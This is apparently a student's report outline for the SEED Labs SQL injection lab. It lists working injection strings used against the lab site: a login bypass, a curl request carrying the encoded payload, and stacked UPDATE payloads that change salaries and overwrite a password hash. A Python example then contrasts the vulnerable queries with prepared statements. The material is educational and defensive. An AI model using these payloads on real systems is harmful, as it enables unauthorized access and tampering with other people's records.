1.Overview
2.Lab Environment
Virtual machine
Access from within the virtual machine:
Physical machine
How to access from the physical machine:
Add a DNS entry for the lab hostname
Apache configuration
No configuration needed
3.Lab Tasks
3.1 Task 1: Get Familiar with SQL Statement
3.2 Task 2: SQL Injection Attack on SELECT Statement
Task 2.1: SQL Injection Attack from webpage.
Constructed injection string: Admin'; #
Task 2.2: SQL Injection from command line.
Obtain the URL-encoded injection code
Target URL: http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin&Password=
Core injection string after URL encoding: admin%27%3B%23
Constructed request: http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23&Password=
or http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23
Send the HTTP request from the terminal: curl 'http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23&Password='
Create a .txt file with the returned page
Rename it to an .html file
Open it in a browser
Task 2.3: Append a new SQL statement.
Constructed injection string: Alice';update credential set name=Alic where ID=1;#
Alternative attempt: Alice' and update credential set name=Alic where ID=1;#
3.3 Task 3: SQL Injection Attack on UPDATE Statement.
Task 3.1: Modify your own salary.
Open Alice's edit page
Her ID in the database is 1
Constructed injection string: ',salary='1' where ID=1;#
Modification succeeded
Task 3.2: Modify other people’s salary
First check Boby's salary
Constructed injection string: ',salary='2' where ID=2;#
Perform the injection on Alice's edit page
After the injection, log in with
boby';#
and check Boby's salary
Task 3.3: Modify other people’s password
SEED Labs SQL Injection stores user passwords as SHA-1 hashes
Constructed injection string: ',Password='40bd001563085fc35165329ea1ff5c5ecbdbbeef' where ID=1;#
3.4 Task 4: Countermeasure-Prepared Statement
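As an added example that is not part of the lab report or the SEED code: the string-built queries behind Tasks 2.1 and 3.2 beside their prepared-statement versions, in Python with SQLite (the lab itself uses PHP and MySQL). The table, names and passwords are constructed, and MySQL's `#` comment marker is replaced with SQLite's `--`.

```python
import hashlib
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the lab's credential table (column set
    # is an assumption). Passwords are SHA-1 hashes, as in the lab, computed in
    # Python because SQLite has no sha1() function.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credential (ID INTEGER PRIMARY KEY, Name TEXT, "
                 "NickName TEXT, Password TEXT, Salary INTEGER)")
    rows = [(1, "Alice", "", hashlib.sha1(b"seedalice").hexdigest(), 20000),
            (2, "Boby", "", hashlib.sha1(b"seedboby").hexdigest(), 30000)]
    conn.executemany("INSERT INTO credential VALUES (?,?,?,?,?)", rows)
    return conn

def login_unsafe(conn, name, password):
    # String concatenation as in unsafe_home.php: quote and comment characters
    # in the input become part of the SQL grammar.
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    sql = f"SELECT ID FROM credential WHERE Name='{name}' AND Password='{pw_hash}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, name, password):
    # Prepared statement: the input is bound as a value, never parsed as SQL,
    # so a Name of "Alice'; --" simply matches no user.
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    row = conn.execute("SELECT ID FROM credential WHERE Name=? AND Password=?",
                       (name, pw_hash)).fetchone()
    return row[0] if row else None

def edit_nickname_unsafe(conn, user_id, nickname):
    conn.execute(f"UPDATE credential SET NickName='{nickname}' WHERE ID={user_id}")

def edit_nickname_safe(conn, user_id, nickname):
    conn.execute("UPDATE credential SET NickName=? WHERE ID=?", (nickname, user_id))

def salary_of(conn, user_id):
    return conn.execute("SELECT Salary FROM credential WHERE ID=?",
                        (user_id,)).fetchone()[0]

def compare(login_fn, edit_fn):
    # Run the Task 2.1 and Task 3.2 inputs through one pair of handlers.
    # '#' is MySQL's comment marker; SQLite needs '--' instead.
    conn = make_db()
    login = login_fn(conn, "Alice'; --", "not-her-password")
    # Alice edits her own nickname (ID=1), but the value targets Boby's row.
    edit_fn(conn, 1, "',Salary='2' WHERE ID=2;--")
    return {"login": login, "boby_salary": salary_of(conn, 2)}
```

With the unsafe pair the login succeeds without a password and Boby's salary becomes 2; with the prepared statements the login fails and the whole payload is stored as Alice's nickname while Boby's salary is untouched.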
4. Guidelines
5. Submission